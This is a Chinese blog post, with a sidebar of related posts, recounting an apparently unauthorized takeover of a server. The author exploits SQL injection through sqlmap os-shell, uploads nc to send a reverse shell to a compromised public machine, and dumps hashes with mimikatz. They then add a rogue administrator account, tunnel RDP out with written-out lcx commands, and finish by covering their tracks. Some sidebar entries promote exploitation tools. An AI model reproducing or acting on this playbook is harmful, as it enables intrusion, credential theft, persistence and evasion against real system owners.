通过注入拿下服务器

最新推荐文章于 2022-04-15 12:08:44 发布
最新推荐文章于 2022-04-15 12:08:44 发布
阅读量2.7k 收藏 1
点赞数 2
分类专栏: 渗透 文章标签: 链接内网机子 dba nc lcx mimikatz
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_36512966/article/details/78922056
版权

 

  首先,碰到了个站。注入漏洞,看一下是不是DBA权限。

 

当前用户是DBA权限,执行os-shell

 

 

 

可以直接执行命令,但是有时候会卡到链接超时,在执行os-shell的过程中有条信息,就是上面打红的地方(忽略掉打码技术),访问该地址它。

 

 

 

能直接上传文件,上传NC,反弹shell(sqlmap里shell实在卡得不行,回显太慢)

 

 

 

上传成功,首先执行NC反弹shell到公网肉鸡里

 

在肉鸡里开启监听,接受到shell。

 

没有公网地址,是内网机子。

 

其次,mimikatz抓管理员密码。

 

 

 

明文密码是抓不到的,抓到了哈希,拿去破解,破不出来。

算了,还是直接添加一个管理员账号吧。

看了一下端口,开了3389.

 

 

 

因为是内网机子,不能直接访问3389端口,这时就需要把内网的端口转发出来了。

用到的工具是lcx.exe

在公网上:lcx.exe -listen 2222 3333(公网监听2222端口,并把监听到的数据传到3333端口)

目标机:lcx.exe -slave xxx.xxx.xxx.xxx 2222 127.0.0.1 3389(把本地的3389端口转发到xxxx:2222公网端口)

 

 

 

 

用刚才添加的用户远程登入。

 

 

 

OK,成功链接。擦屁股走人

椰树ii
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
渗透实战:从sql注入撸下服务器
白泽Sec安全实验室
11-25 617
前言:大家好!在一次网上冲浪中,走狗屎运发现了一处sql注入。 信息收集: 接下来赶紧探测一下网站指纹信息 找到ip之后随手测试发现有四个旁战 开放端口:21、25、80、135、143、3306、3389、49155、49156 扫描目录扫描出后台登陆框(但是页面破损无法正常浏览),因为没有WAF直接sqlmap一把梭,一步到胃! 并非是管理员权限,在数据库翻箱倒柜找了一通,在快要放弃的时候找到一些敏感信息:数据库管理员用户密码。 由于有注入的这个站点,登录地址破损无法正常显示,回想起来还有旁站。回过
JNDIExploit:用于JNDI注入攻击的恶意LDAP服务器
03-19
一款用作JNDI注入利用的工具,大量参考/引用了Rogue JNDI项目的代码,支持直接插入植入内存shell ,并集成了常见的bypass 高版本JDK的方式,适用于与自动化工具配合使用。 使用说明 使用java -jar JNDIExploit.jar -...
拿下网站服务器,实战拿下某技校网站与服务器
weixin_29507477的博客
08-07 286
实战拿下某技校网站与服务器2019-03-160x01:起因闲的无聊与小表弟随便找站玩,最后盯上了一个看起来不错的技校网站,一翻思想的激烈碰撞之后,就有了这个文章....0x02:信息搜集经过一番信息搜集,得到的信息如下:1.网站脚本:aspx2.网站cms:siteserver3.cms版本4.00x03:查询漏洞库大家都知道siteserver cms的3.x版本存在很多比较严重的漏洞,...
服务器经常被注入
seagle79113的专栏
08-24 584
 我们在给客户开发B/S架构的程序经常会遇到这样的问题,系统经常被黑。我这里有几个办法来屏蔽tomcat为服务器的几种方法。1、把webapps目录下所有文件删除,有很多人在安装完系统经常忘记设置tomcat服务器口令,所以这个口令非常容易取得,然后自己上传一个应用,通过这个应用就可以控制你整台机器了,最后导致信息丢失。2、有人通过猜测目录结构,也可以访问一些文件,通过控制这个op
看我如何拿下BC站的服务器
weixin_46137328的博客
10-13 2759
一、信息收集拿到目标网站,可见是一个很常规的bc站。先进行简单的信息收集,通过Wappalyzer插件可见php版本与windows serve这两个比较重要的信息命令行nslookup...
看我如何拿下公司OA服务器
zhangge3663的博客
01-04 262
0x00 信息收集 目标地址:http://oa.xxx.com:8888/art/,访问后界面如下 获取某个系统shell后发现其是docker nmap扫描全端口: nmap -v -A -p1-65535 -oN oa.xxx.com.txt oa.xxx.com 结果只开放了53/tcp和8888/tcp,如下图: 网络架构猜测:被扫描的ip应该是公司的出口防火墙,网站躲在防火墙的后面,防火墙开了8888端口转发到内部服务器,至于53/tcp可能是防火墙本身开的端口 系统方面的利
马哥cookie强力注入工具
10-19
利用Cookie欺骗攻击网站,用“ Cookie强力注入修改工具”向该站服务器提交管理员Cookie,这样即可冒充管理员绕过密码验证登入后台,然后再通过后台的上传功能上传木马拿下 Webshell
利用SQL注入漏洞登录后台的实现方法
12-15
早在02年,国外关于SQL注入漏洞的技术文章已经很多,而国内在05年左右...轻则数据遭到泄露,重则服务器拿下。 现在,很多网站开发人员知其然而不知其所以然,小弟也是,所以赶紧恶补下,总结如学习内容。希望对初学者
asp脚本提权轻松拿下服务器.rar
12-28
【ASP脚本提权轻松拿下服务器】这个主题主要涉及到的是Web安全领域中的一个关键问题——权限提升(Privilege Escalation)。在Web应用程序中,尤其是ASP(Active Server Pages)架构的站点,由于编程不当或者安全...
php中sql注入漏洞示例 sql注入漏洞修复
12-18
轻则数据遭到泄露,重则服务器拿下。 一、SQL注入的步骤 a) 寻找注入点(如:登录界面、留言板等) b) 用户自己构造SQL语句(如:’ or 1=1#,后面会讲解) c) 将sql语句发送给数据库管理系统(DBMS) d) DBMS接收...
提权拿服务器
12-17
网站提权拿服务器的教程,挺不错的 ,希望对大家有帮助,好好学习一下!
sql注入提权拿服务器
12-06
sql注入提权拿服务器
渗透入侵\椰树1.9.zip
07-15
椰树1.9
椰树web漏洞扫描渗透测试工具
12-28
:web漏洞扫描 批注和子域名查询 C段查询 后台扫描 CMS安全检测 批量注入 浏览器功能 使用最为常见的是web扫描器-旁注C段和后台扫描功能,这款工具功能堪比御剑扫描器
椰树1.8 web漏洞扫描器
08-07
最新的椰树1.8 web漏洞扫描器 功能不解释,新增加三种漏洞检测! 你值得拥有的网站防护利器!
服务器启动监听的时候bean注入
桥边红药
01-11 182
public void contextInitialized(ServletContextEvent sce)  {         BaseService bs = WebApplicationContextUtils.getWebApplicationContext(sce.getServletContext()).getBean(BaseService.class);         Map...
提权学习:提权拿服务器方法总结-超细(补充节点0x02)
bylfsj的博客
10-09 2600
当你的才华 还撑不起你的野心时 那你就应该静下心来学习 目录 【 web提权 】   dos命令大全   SQL语句直接开启3389 常见杀软 windows提权中敏感目录和敏感注册表的利用 提权中的敏感注册表位置 wscript.shell的删除和恢复 如何找到准确的终端连接端...
利用SQLmap 拿服务器shell
weixin_33834628的博客
07-25 1345
1、简介 sqlmap是一个自动化的SQL注入工具,其主要功能是扫描,发现并利用给定的URL的SQL注入漏洞,目前支持的数据库是MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase和SAP MaxDB。采用五种独特的SQ...
服务器提权常见方法介绍
seek_2022的博客
04-15 6635
文章目录一、提权常见的方法 很多时候渗透测试人员,在做渗透的时候,拿到了网站权限,会发现,网站的权限调用的CMD命令,其实只是网站的权限,并不是服务器管理员权限,这个时候就需要去想办法提升自己的权限,只有自己的权限够了,才可以去更好的做内网测试。 一、提权常见的方法 Windows常用的提权方式有:内核提权、数据库提权、系统配置错误提权、组策略首选项提权、Bypass UAC提权、令牌窃取提权等姿势。 1、windows/linux系统漏洞提权; 查看windows打了什么补丁,然后去网上找存在什么样的漏
sql注入怎么获取服务器权限
最新发布
05-27
首先,我必须强调,SQL注入是一种违法行为,是攻击者利用应用程序的漏洞,将恶意SQL代码注入到后台数据库中,从而获取非法访问权限。因此,我不会提供任何有关如何进行SQL注入攻击的信息。 在现实世界中,攻击者可能会利用SQL注入漏洞获取服务器权限的方式,包括但不限于以下几种: 1. 利用数据库管理员权限:如果攻击者成功注入一段恶意SQL代码,并且该代码能够执行管理员级别的操作,攻击者就可以利用这个漏洞获取数据库管理员权限。 2. 利用数据库漏洞:攻击者可以利用数据库软件中的漏洞,比如未修补的漏洞或配置错误,来获取服务器权限。 3. 利用操作系统漏洞:攻击者可以利用操作系统中的漏洞,比如未修补的漏洞或配置错误,来获取服务器权限。 但是需要注意的是,任何一种攻击方式都是非常危险和犯罪的行为,并且其后果是极其严重的,攻击者可能会面临法律追究和惩罚。因此,我们应该遵守法律,不要进行任何非法的攻击行为。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值